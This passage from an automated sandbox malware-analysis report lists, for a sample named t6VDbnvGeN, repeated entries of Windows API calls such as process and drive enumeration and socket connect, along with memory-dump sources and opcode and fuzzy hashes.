                                                              • Instruction ID: 88531203879b1fd851663f0d6be473e707dd7e096bf2f4784ed09fdf13863d1b
                                                              • Opcode Fuzzy Hash: 7b376d54ac8f816e6e948e81b934565e01b35e93fa45592be9e890460dfd612d
                                                              • Instruction Fuzzy Hash: 37519EEB26C125BD710290816F1CEFB6B2EF5C7730B318C26F80BD7282E2954E4A1171
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              • Opcode ID: 995b0128f3176c5660df6de5353314bfdb9b44ac10c6cf0d24ff8e3be56e3a57
                                                              • Instruction ID: 0796fdf33c14b28e63dddab0ad83bdce82f5e57c63b871038094fc0a4eb0ef58
                                                              • Opcode Fuzzy Hash: 995b0128f3176c5660df6de5353314bfdb9b44ac10c6cf0d24ff8e3be56e3a57
                                                              • Instruction Fuzzy Hash: B35183EB25C221BDB12285416F18EFB5B2EF5D3730B31C826F80BD6682E3D94A4E5171
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07560397
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: b5d46f70eccafd33e37a5da87b04b7652ee547d8ccaed9bf7708dd1101ed660f
                                                              • Instruction ID: 8d4d6db7edb02bb53811b33936782947836e120782b82790c68dbfd0fcdc793a
                                                              • Opcode Fuzzy Hash: b5d46f70eccafd33e37a5da87b04b7652ee547d8ccaed9bf7708dd1101ed660f
                                                              • Instruction Fuzzy Hash: C331D6EB25C115BE650281816F58EFA6B2EFAD7731B308C63F40FD72C1E2A50A4A5171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 10c5594b935370a9c7075c2509725460d8e970a71e8f9c3ebbb4a4a2b9064c8c
                                                              • Instruction ID: 2951daf605ebc2aa589017b202d8229265a4b4f3e27f5f8e37c19ec25faca2fa
                                                              • Opcode Fuzzy Hash: 10c5594b935370a9c7075c2509725460d8e970a71e8f9c3ebbb4a4a2b9064c8c
                                                              • Instruction Fuzzy Hash: BE31F8EB25C115BFA60281809B58EFA6B6EFAD7730B308866F40FD72C1D2950A4A5631
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 38039dca877d89c6cb82343cb3c7625df16e900a5968229547d5e587b6512eb5
                                                              • Instruction ID: 01a7d172fd66d00100917f68362e7e7a940e6e4488cb02f9eef55d349782378a
                                                              • Opcode Fuzzy Hash: 38039dca877d89c6cb82343cb3c7625df16e900a5968229547d5e587b6512eb5
                                                              • Instruction Fuzzy Hash: 792103EB25C125BE66028180AB1CEFB6B2EF9D7331B308872F40FD7281E2D50A4A5131
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 37a43564e838f31c794a2264ef8cd9a4410d5ad76b9afaae00d248b11d487e56
                                                              • Instruction ID: 07ffb77e44b288dffb3c64fd65646955a8a3bc82576c703693a0841b9619ac3e
                                                              • Opcode Fuzzy Hash: 37a43564e838f31c794a2264ef8cd9a4410d5ad76b9afaae00d248b11d487e56
                                                              • Instruction Fuzzy Hash: 6B21F7EB25C115BEA60281816B58EFA6B2EFAD7731B308876F40FD72C2D2D50A4A5135
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 8cbf47a7303a825230e8d32f0bfa84eb712f9f060add834f0e5d2cd23f8c861e
                                                              • Instruction ID: 2a65108c7c7e694df441139e3024d621ebcfc92815922a9de5931b1f78f11d57
                                                              • Opcode Fuzzy Hash: 8cbf47a7303a825230e8d32f0bfa84eb712f9f060add834f0e5d2cd23f8c861e
                                                              • Instruction Fuzzy Hash: A421F6EB25C115BE650391816B58EF66B6EF9D7331B308872F40FD7282D2D50A4A5135
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              • Opcode ID: 2f94b39d1be79eb2c267d2572917ef8b9ae297a92722e5d982065a092d2fca99
                                                              • Instruction ID: f7e3ee11ae3b0dc4cdfd274b2d71dc25e771780100f7e2da38242a17b908aab2
                                                              • Opcode Fuzzy Hash: 2f94b39d1be79eb2c267d2572917ef8b9ae297a92722e5d982065a092d2fca99
                                                              • Instruction Fuzzy Hash: 031160EB29D2657E712385A12F58DFB9B2EF4C36707308936F80BD2682E2C44A4E1031
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 5bd659eaec2577fda0d9b95dcf2e94e10dfb8677c9ccfa109656706ab368aa4b
                                                              • Instruction ID: b1403c5542b6411d0414b29bd940d381f93c29a022bff0a14832a9fee42f6754
                                                              • Opcode Fuzzy Hash: 5bd659eaec2577fda0d9b95dcf2e94e10dfb8677c9ccfa109656706ab368aa4b
                                                              • Instruction Fuzzy Hash: B111DAEB25D1157E760391816B58EFA6B6EF9D33317308876F40BD7182D2D40A4E6136
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 8914e49cf7813450f25f78e7a13311ad41a0965381bcea47ac839039fa2d8264
                                                              • Instruction ID: 978dd16a339402a3baba4d011401db654088a63feba68fa09babc86f2f68e61d
                                                              • Opcode Fuzzy Hash: 8914e49cf7813450f25f78e7a13311ad41a0965381bcea47ac839039fa2d8264
                                                              • Instruction Fuzzy Hash: 572105FB2482157FA60391815B58DFA7B6EFAC3731730887AF40BD7582D2950A4A6231
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07560397
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 82a7ccb475ff55993a874cd196775ae0509902bb12ebe9b4447947ea69caaa80
                                                              • Instruction ID: f62928deb89337747689eac688341fe6c9ce3c0cae1d11fce797ce1a0da7d60c
                                                              • Opcode Fuzzy Hash: 82a7ccb475ff55993a874cd196775ae0509902bb12ebe9b4447947ea69caaa80
                                                              • Instruction Fuzzy Hash: 8511C2EB2481197E760291811B5CEFB6B6DFAC3732B308876F40FE7282D2D40A4D6136
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: a5a199a52b1b58ab5dceca4f264067034f30b8c817508aff3c23cef8935560a6
                                                              • Instruction ID: a9657e6fb5be4d40649b78b8576ef586de37edb57d055f5a7cb857786b125d48
                                                              • Opcode Fuzzy Hash: a5a199a52b1b58ab5dceca4f264067034f30b8c817508aff3c23cef8935560a6
                                                              • Instruction Fuzzy Hash: F811E5EB2581157E760291811B58EFA6B6DFAD3331B30C876F40BD7282D2D40A4D2236
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID: FD %s:%d sclose(%d)
                                                              • API String ID: 2781271927-3116021458
                                                              • Opcode ID: 11d258bbc32c30311344a5ad1fba07d3e8e0751644ebc7da8ae3948dc063dd23
                                                              • Instruction ID: a94d7012962d91f00aeaa4b41ac102a86b9c4a31e4b9d191f646453e75454431
                                                              • Opcode Fuzzy Hash: 11d258bbc32c30311344a5ad1fba07d3e8e0751644ebc7da8ae3948dc063dd23
                                                              • Instruction Fuzzy Hash: C2D05E22A0A221AB8530A598AC48D5BABA8AEC6F30B09085CF94477205D6249C01C7F3
                                                              APIs
                                                              • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0088B29E,?,00000000,?,?), ref: 0088B0B9
                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00873C41,00000000), ref: 0088B0C1
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastconnect
                                                              • String ID:
                                                              • API String ID: 374722065-0
                                                              • Opcode ID: ab078747ee7c15bf387a88aa313ae2bf2ee44337e63001fe9e1d04a388897185
                                                              • Instruction ID: ac7f65d52bde1feca512ef5a9aad7de4b8f292d031f4a3baf46bfdd5768e3212
                                                              • Opcode Fuzzy Hash: ab078747ee7c15bf387a88aa313ae2bf2ee44337e63001fe9e1d04a388897185
                                                              • Instruction Fuzzy Hash: EE01D8322046045BCA206A68CC44F6BB799FFC9364F140B24F978E32E1D726DD509752
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 807c31f93ced3ed141d8321c5a0d884a915beed200b5c188d71b6feffef2fd4c
                                                              • Instruction ID: 36e1aa25a251472de952499409b95a2990d4694057de26c2b382949a722d2203
                                                              • Opcode Fuzzy Hash: 807c31f93ced3ed141d8321c5a0d884a915beed200b5c188d71b6feffef2fd4c
                                                              • Instruction Fuzzy Hash: 6641B1E76BD1617D724290556F649FE2B5EF5CB730B30883AF80BD7582F2890E8A5132
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 97ccc4c205bccc91c09aceebef9851557a457c3c2e11831c49e4ea52df7aeac3
                                                              • Instruction ID: bee61b77c665d75f658aaff71287070c02caf6dbafb888ade11ad00d2de40cb6
                                                              • Opcode Fuzzy Hash: 97ccc4c205bccc91c09aceebef9851557a457c3c2e11831c49e4ea52df7aeac3
                                                              • Instruction Fuzzy Hash: 30317FEB6BD165BD714290456F649FE675EF5CB730B30883AB80BD7582F2840E895132
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: e522316d358546a726c54df55fefdd4c2eabd4c7adf6ed6c096c7db2c2882056
                                                              • Instruction ID: ac6042858ca876fb6d6971d50546307bcb8a5b9cd09955676c4cd8f0d1a295b1
                                                              • Opcode Fuzzy Hash: e522316d358546a726c54df55fefdd4c2eabd4c7adf6ed6c096c7db2c2882056
                                                              • Instruction Fuzzy Hash: 0141D1EBA7C155BDB24284516A64AFE2B6DF5C7730B30883AF80BD75C2F2880E595171
                                                              APIs
                                                              • gethostname.WS2_32(00000000,00000040), ref: 00874AA5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: gethostname
                                                              • String ID:
                                                              • API String ID: 144339138-0
                                                              • Opcode ID: 8ee2c2d4df8d17631a77eb4bc2090eb290dbcfe41ab0c6e40f8fbbe89a5a2453
                                                              • Instruction ID: e2a186327fd7ce90abc2d139fa48c96f0ac3e35231153c1f013f90daeee4278b
                                                              • Opcode Fuzzy Hash: 8ee2c2d4df8d17631a77eb4bc2090eb290dbcfe41ab0c6e40f8fbbe89a5a2453
                                                              • Instruction Fuzzy Hash: B551C1706043009BE7309B65DD897277AE4FF05329F14A83DEA8EC66A9E775EC84C742
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 598ef01487e3c0dc4877884ba429805e6e6f0486b17d4cbae3c20fb323283368
                                                              • Instruction ID: 4a8596170278d635f0acf81faf134f1f82b72c3bf26b4a26d4619924260004dc
                                                              • Opcode Fuzzy Hash: 598ef01487e3c0dc4877884ba429805e6e6f0486b17d4cbae3c20fb323283368
                                                              • Instruction Fuzzy Hash: 1C31AFE767D151BDB24291516F64AFE2B5DF5CB730B30883AB80BD75C2F2880E895172
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 532e4c52e9baff3c7ed52daf233139af7e570b9437360384a8e7eabfb6d2ac50
                                                              • Instruction ID: 4463855c58a76b85ffec34c7e8f83c9319f0221ab234b13cd9d239e4c9441c33
                                                              • Opcode Fuzzy Hash: 532e4c52e9baff3c7ed52daf233139af7e570b9437360384a8e7eabfb6d2ac50
                                                              • Instruction Fuzzy Hash: E7317EEB67D165BD724290416B64AFE275DF5CB730B30883AB80BD7582F2880E995132
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: d992e95eb50c1d4e7688015e7052e5fde7fa5b882b09846fc9e725529f4acbcd
                                                              • Instruction ID: 814cd914160b3ef4ba10b2f083e69068c873ff55a818c432a572f935648fcdf5
                                                              • Opcode Fuzzy Hash: d992e95eb50c1d4e7688015e7052e5fde7fa5b882b09846fc9e725529f4acbcd
                                                              • Instruction Fuzzy Hash: 41319CEB27D161BD714290412B64AFE676EF4CB730B30C836F80BDB582F2880E895176
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 5afd444b1a35f9b3404fabaef2c992771f2a7341d431af8469ae5af3ef846f25
                                                              • Instruction ID: 9a23c6fb171d1bd4999af2c21e065f45d2bd53a58f072301602bcd55161d4b77
                                                              • Opcode Fuzzy Hash: 5afd444b1a35f9b3404fabaef2c992771f2a7341d431af8469ae5af3ef846f25
                                                              • Instruction Fuzzy Hash: 13216DE767D165BD714290416B549FE671EF4CB730B30C83AB80BD7581F2880E995076
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
